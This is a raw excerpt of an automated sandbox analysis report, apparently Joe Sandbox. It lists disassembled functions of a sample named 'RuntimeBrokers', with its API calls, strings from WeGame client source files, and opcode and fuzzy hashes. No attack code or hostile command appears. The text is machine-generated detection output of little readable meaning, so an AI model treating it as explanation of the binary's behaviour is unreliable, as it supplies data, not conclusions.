                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000), ref: 6C0CEE13
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000060,6C0CE5A3,?,00000000,6C0CE541), ref: 6C0CEE6B
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\asy_udp.cpp, xrefs: 6C0CED78, 6C0CEE3F, 6C0CEE8F
                                        • [common][Asy_udp] sock(%d) recv thread create failed., xrefs: 6C0CEE59
                                        • [common][Asy_udp] recv thread is already running., xrefs: 6C0CED8C
                                        • [common][Asy_udp] sock(%d) recv_start failed, invalid params, max_pkg_len_=%d., xrefs: 6C0CEEAC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$H_prolog3H_prolog3_H_prolog3_catch_
                                        • String ID: [common][Asy_udp] recv thread is already running.$[common][Asy_udp] sock(%d) recv thread create failed.$[common][Asy_udp] sock(%d) recv_start failed, invalid params, max_pkg_len_=%d.$d:\ci_dev\wegame_client\codes\common\src\asy_udp.cpp
                                        • API String ID: 2321812390-934111829
                                        • Opcode ID: 71b7d7fce7e016a7ef91d25076ac3c255edace5ebb453586689322c67d04597e
                                        • Instruction ID: fcbe284cbd0df5e30bb39734bd402adc604bcbef55a487a9996897d02e27f457
                                        • Opcode Fuzzy Hash: 71b7d7fce7e016a7ef91d25076ac3c255edace5ebb453586689322c67d04597e
                                        • Instruction Fuzzy Hash: 40418371A01705ABDB20EBA4C855B9E73F5AF50708F20455DE4612BEC0EB76BA09DE82
                                        Function 6C152417 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 107COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C152421
                                        • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 6C152438
                                        • _localtime64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 6C152451
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C152461
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • UNKOWN, xrefs: 6C1524CC
                                        • [Sys_wrapper] get lcoaltime failed, cur_tm=NULL, xrefs: 6C15249E
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C152488
                                        • %d-%d-%d, xrefs: 6C1524F2
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@_localtime64_time64
                                        • String ID: %d-%d-%d$UNKOWN$[Sys_wrapper] get lcoaltime failed, cur_tm=NULL$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 3421849107-2033272978
                                        • Opcode ID: 8c26efaf8442dd9fa906ec868318b481f566dc1c26c3ffd69175a9115d9d6bfa
                                        • Instruction ID: 8623557a3a623e961045fd6f8cc18a5301d132991652f34b248a606ab6a94bfe
                                        • Opcode Fuzzy Hash: 8c26efaf8442dd9fa906ec868318b481f566dc1c26c3ffd69175a9115d9d6bfa
                                        • Instruction Fuzzy Hash: AA415EB1A002189BDB24DFA4CC94BDD7BB4AF55308F1040D9E509AB681DF79AB48CF91
                                        Function 0041E142 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 107fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0041E18A
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000001), ref: 0041E19D
                                        • OpenFileMappingW.KERNEL32(00000004,00000000,?), ref: 0041E247
                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0041E26A
                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0041E2A8
                                        • CloseHandle.KERNEL32(00000000), ref: 0041E2BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: File$DescriptorSecurityView$CloseDaclHandleInitializeMappingOpenUnmap
                                        • String ID: %lu$TenProtect3_Share_Data_
                                        • API String ID: 3295607151-716767062
                                        • Opcode ID: d9803b7a7a12bbfa5a8c40bf4425ac38470e7144f24b941455b88b62a5989f31
                                        • Instruction ID: 59720a7e9658fbd3fd0e5c48fd7cecebca43176bf68242d1e763a416c428965c
                                        • Opcode Fuzzy Hash: d9803b7a7a12bbfa5a8c40bf4425ac38470e7144f24b941455b88b62a5989f31
                                        • Instruction Fuzzy Hash: 6941967594121CAFEB20DB50CC4ABDDB7B6AF58310F0040D5E508E72D1DBB65AA9CF58
                                        Function 6C12E493 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 101fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12E49D
                                          • Part of subcall function 6C12E23A: __EH_prolog3.LIBCMT ref: 6C12E241
                                          • Part of subcall function 6C12E23A: ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(00000018,6C12E6E7,6C439534,6C439584,00000054,6C12BD53,TGP_COM_URL), ref: 6C12E246
                                          • Part of subcall function 6C12E23A: ?find_component@Component_mgr@common@ierd_tgp@@QAE?AV?$weak_ptr@UIComponent@common@ierd_tgp@@@std@@ABVcomponent_interface_type@23@@Z.COMMON(?,?,00000018,6C12E6E7,6C439534,6C439584,00000054,6C12BD53,TGP_COM_URL), ref: 6C12E254
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(domain_table.txt,6C3494E0), ref: 6C12E4DE
                                        • memset.VCRUNTIME140(?,00000000,00000400), ref: 6C12E500
                                        • memset.VCRUNTIME140(?,00000000,00000400,?,00000000,00000400), ref: 6C12E50E
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C12E5F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memset$?find_component@?get_comp_mgr_instance@common@ierd_tgp@@Component@common@ierd_tgp@@@std@@Component_mgr@12@Component_mgr@common@ierd_tgp@@H_prolog3H_prolog3_V?$weak_ptr@Vcomponent_interface_type@23@@fclosefopen
                                        • String ID: %s %s$domain_table.txt$domain_table_hk.txt
                                        • API String ID: 1767544337-3851574225
                                        • Opcode ID: 3b330230d4615e4ffcbc55e737ca88ad7e3c7afc9931d3755aba3918df40b3be
                                        • Instruction ID: 340f183fc61016a3b7034bcd05401a2a3166fab2b1d54e6f3639844b347f3f3a
                                        • Opcode Fuzzy Hash: 3b330230d4615e4ffcbc55e737ca88ad7e3c7afc9931d3755aba3918df40b3be
                                        • Instruction Fuzzy Hash: 1B31A0768002189ECB20DF64CC40AD973BCBF55218F14C5E9E559A7A80EF355BCA8FE1
                                        Function 6C15E2A6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15E2B0
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(000002C8), ref: 6C15E2BB
                                        • memset.VCRUNTIME140(?,00000000,00000208,000002C8), ref: 6C15E323
                                        • memset.VCRUNTIME140(?,00000000,00000058,?,00000000,00000208,000002C8), ref: 6C15E335
                                        • GetOpenFileNameW.COMDLG32(?,?,?,?,?), ref: 6C15E3A8
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?), ref: 6C15E3FD
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C15E2DF
                                        • [Sys_wrapper]open_sys_openfile_dialog, xrefs: 6C15E2F6
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memset$?get_log_instance@base@@?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@FileH_prolog3H_prolog3_H_prolog3_catch_Logger@1@NameOpenU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@
                                        • String ID: [Sys_wrapper]open_sys_openfile_dialog$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 1892290767-937071972
                                        • Opcode ID: 2402f1c5e1f4eec5b97a1f927c2e001b92a0752173508ae13710a805e389d960
                                        • Instruction ID: b65c8317f5c778a4613289de0214c3c417c268cc004fa695c44ac2d836e0550c
                                        • Opcode Fuzzy Hash: 2402f1c5e1f4eec5b97a1f927c2e001b92a0752173508ae13710a805e389d960
                                        • Instruction Fuzzy Hash: AC414A70D41228ABCB60DF64CC89BCDB7B4AF15714F6042D9D418B7690DB74AB898F94
                                        Function 0049C6E5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 0049C6EC
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0049C6F6
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • std::_Facet_Register.LIBCPMT ref: 0049C747
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0049C767
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0049C785
                                        • __EH_prolog3.LIBCMT ref: 0049C792
                                        • _Mpunct.LIBCPMT ref: 0049C7B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Exception@8Facet_MpunctRegisterThrow
                                        • String ID: nX
                                        • API String ID: 2905739349-2063534963
                                        • Opcode ID: e281bcf8a18f72ad25c8dae176b73fd7a9542d5f209818b998d6634292402df7
                                        • Instruction ID: 83dd5c4c44649e168e336bf91c1334836a276dce55411eb7492c591af16ac739
                                        • Opcode Fuzzy Hash: e281bcf8a18f72ad25c8dae176b73fd7a9542d5f209818b998d6634292402df7
                                        • Instruction Fuzzy Hash: D321D375900219DBCF01EFA5E841AEE7FB4BF55714F14041FF8506B292CB789A04DB59
                                        Function 6C0B2B11 Relevance: 13.8, APIs: 9, Instructions: 299COMMON
                                        Download Yara Rule
                                        APIs
                                        • memmove.VCRUNTIME140(?,00000000,?), ref: 6C0B2BD0
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?), ref: 6C0B2C1D
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?), ref: 6C0B2C69
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?), ref: 6C0B2CBB
                                          • Part of subcall function 6C0AFE80: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 6C0AFF43
                                          • Part of subcall function 6C0AFE80: memmove.VCRUNTIME140(00000010,00000000,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 6C0AFF51
                                        • memmove.VCRUNTIME140(?,6C3CE7AC,00000001,B33B76E5), ref: 6C0B2D18
                                        • memmove.VCRUNTIME140(?,00000000,?,?,00000002,00000001,00000000,6C3CE7AC,00000001,B33B76E5), ref: 6C0B2D95
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00000002,00000001,00000000,6C3CE7AC,00000001,B33B76E5), ref: 6C0B2DE4
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00000002,00000001,00000000,6C3CE7AC,00000001,B33B76E5), ref: 6C0B2E33
                                          • Part of subcall function 6C0AFBA0: memmove.VCRUNTIME140(?,00000000,?,00000000,?,00000000,?,6C138F61,?,tqos=,00000000,?,?,Body,?,Head), ref: 6C0AFC09
                                          • Part of subcall function 6C0AFBA0: memmove.VCRUNTIME140(00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,6C138F61,?,tqos=,00000000,?,?), ref: 6C0AFC15
                                          • Part of subcall function 6C0AFBA0: memmove.VCRUNTIME140(00000000,00000000,00000001,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,6C138F61,?,tqos=), ref: 6C0AFC2D
                                        • memmove.VCRUNTIME140(?,6C3CE7AC,00000001,?,00000000,00000000,?,?,00000002,00000001,00000000,6C3CE7AC,00000001,B33B76E5), ref: 6C0B2E7C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memmove$_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 2580228974-0
                                        • Opcode ID: 82f8a016a6ed40bfc357ae4b68274814881c4e46cea059885d06a38b0668d93f
                                        • Instruction ID: 5edd4695d9b90f2a879be9ee131d523e4a73ecf7f92e2d8d9452617af8648bf7
                                        • Opcode Fuzzy Hash: 82f8a016a6ed40bfc357ae4b68274814881c4e46cea059885d06a38b0668d93f
                                        • Instruction Fuzzy Hash: ECB1C731A002449FDB14CFB8CC88B9DBBF6FF49304F104558E415ABB92D776A985CB92
                                        Function 6C0CE7B8 Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CE7CF
                                        • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 6C0CE7E5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?pptr@?$basic_streambuf@D@std@@@std@@U?$char_traits@
                                        • String ID:
                                        • API String ID: 1676136795-0
                                        • Opcode ID: f9a09ba51a25ad935e2ca2df18407fe5ee86c1e26be2dbf2f8c7d6791276c3fc
                                        • Instruction ID: d373a5a288724bf084c996d3cdb3c20787767623bd0a3297e80870dcef65dcd9
                                        • Opcode Fuzzy Hash: f9a09ba51a25ad935e2ca2df18407fe5ee86c1e26be2dbf2f8c7d6791276c3fc
                                        • Instruction Fuzzy Hash: 71514471B012108FCB49CF6DC48465DBBF9FF4A314B6581A9EC1ADB796CB70A804CB91
                                        Function 6C11AFD1 Relevance: 13.6, APIs: 9, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C11AFDB
                                        • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP140(00000000,00000000,00000002,?,00000025,00000040,00000001,000000D8,6C119A84,?,?,0000000C,6C0B4E50,?,?,?), ref: 6C11B014
                                        • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,00000006,00000008,png), ref: 6C11B021
                                        • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140(?,?,00000006,00000008,png), ref: 6C11B035
                                        • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP140(00000000,00000000,00000000,?,00000006,00000008,png), ref: 6C11B057
                                        • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,00000006,00000008,png), ref: 6C11B064
                                        • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@U_Mbstatet@@@2@XZ.MSVCP140(?,?,00000006,00000008,png), ref: 6C11B078
                                        • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PAD_J@Z.MSVCP140(?,00000010,?,00000010,?,?,00000006,00000008,png), ref: 6C11B0AD
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000010,?,?,00000006,00000008,png), ref: 6C11B0C2
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@@std@@U?$char_traits@$?good@ios_base@std@@?seekg@?$basic_istream@?tellg@?$basic_istream@Mbstatet@@@2@V12@_V?$fpos@$??1?$basic_ios@?read@?$basic_istream@H_prolog3V12@
                                        • String ID:
                                        • API String ID: 2540225853-0
                                        • Opcode ID: ea86677874ee72cecbeca0ebafb539f6f1679b2dcbff486d798147cc4d60f49b
                                        • Instruction ID: 85a97e2585fe5c1f88ef4195b38ec887bac1005312edaa08b9025aa5d2cd00c2
                                        • Opcode Fuzzy Hash: ea86677874ee72cecbeca0ebafb539f6f1679b2dcbff486d798147cc4d60f49b
                                        • Instruction Fuzzy Hash: 4F319E35A001089FCB24CF64C988FED7779EF4A318F5581A9E51A776A1DB34AE48CF50
                                        Function 004EA6AB Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,unL,004C6E75,?,?,?,004EA8FC,00000001,00000001,A3E85006), ref: 004EA705
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004EA8FC,00000001,00000001,A3E85006,?,?,?), ref: 004EA78B
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A3E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004EA885
                                        • __freea.LIBCMT ref: 004EA892
                                          • Part of subcall function 004E3C64: HeapAlloc.KERNEL32(00000000,00000000,00000001,?,004DCC72,-00000001,?,00000000,00000000,?,?,?,?,?,?,004DCC0E), ref: 004E3C96
                                        • __freea.LIBCMT ref: 004EA89B
                                        • __freea.LIBCMT ref: 004EA8C0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocHeap
                                        • String ID: unL
                                        • API String ID: 3147120248-695154747
                                        • Opcode ID: c59d013e93d6723969e4938072905dd4676b920f826705fef149171a85d50ff3
                                        • Instruction ID: 6fa4836830270e02fb3bc4411526564d1c6159bead7e4f4639e1ecd42a874e32
                                        • Opcode Fuzzy Hash: c59d013e93d6723969e4938072905dd4676b920f826705fef149171a85d50ff3
                                        • Instruction Fuzzy Hash: 4A510472600246AFEB259E66CC41EBF77A9FF44751F14462EFC08D6240DB38EC62C65A
                                        Function 6C0E3E6C Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • unexpected end of line, xrefs: 6C0E3F9C
                                        • d:\ci_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\info_parser_read.hpp, xrefs: 6C0E404C
                                        • expected ", xrefs: 6C0E3FE1
                                        • class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > __cdecl boost::property_tree::info_parser::read_string<char>(const char *&,bool *), xrefs: 6C0E4051
                                        • expected end of line after \, xrefs: 6C0E3F43
                                        • unexpected \, xrefs: 6C0E4023
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
